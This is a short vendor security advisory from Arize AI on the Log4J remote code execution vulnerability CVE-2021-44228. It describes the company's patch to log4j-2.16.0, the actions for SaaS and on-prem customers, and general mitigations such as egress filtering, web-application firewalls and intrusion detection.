2021-12-15: CVE-44228

Summary

An open-source library, Log4J, used widely in many products worldwide has been reported (2021-12-09) to have a critical vulnerability, and is now published as CVE-2021-44228.

This vulnerability allows Remote Code Execution and is easy enough to trigger that the CVSS score is 10.

This vulnerability has been fixed in log4j-2.15.0 and greater.

More information from the National Vulnerability Database can be found (here).

As an Arize AI customer am I impacted?

Arize teams followed security protocol on 2021-12-10 09:03 and here is the conclusion of our Vulnerability Analysis report.

Although the vulnerability is not directly exposed, to ensure future exploits are not possible in any case, we did do an update to use log4j-2.16.0 for impacted internal components.

SAAS Platform

No action is required on your end, we are running our latest environment.

On-Prem

Please reach out to Arize to follow the procedure to update your environment.

Mitigation controls that prevent exploitation

• A EGRESS filtering firewall, would prevent the exploit payload to be loaded.

• A Web-Application Firewall can catch exploit payload before it reaches the server.

• Close monitoring of server process using an Intrusion Detection System would also detect the abnormal behavior of the application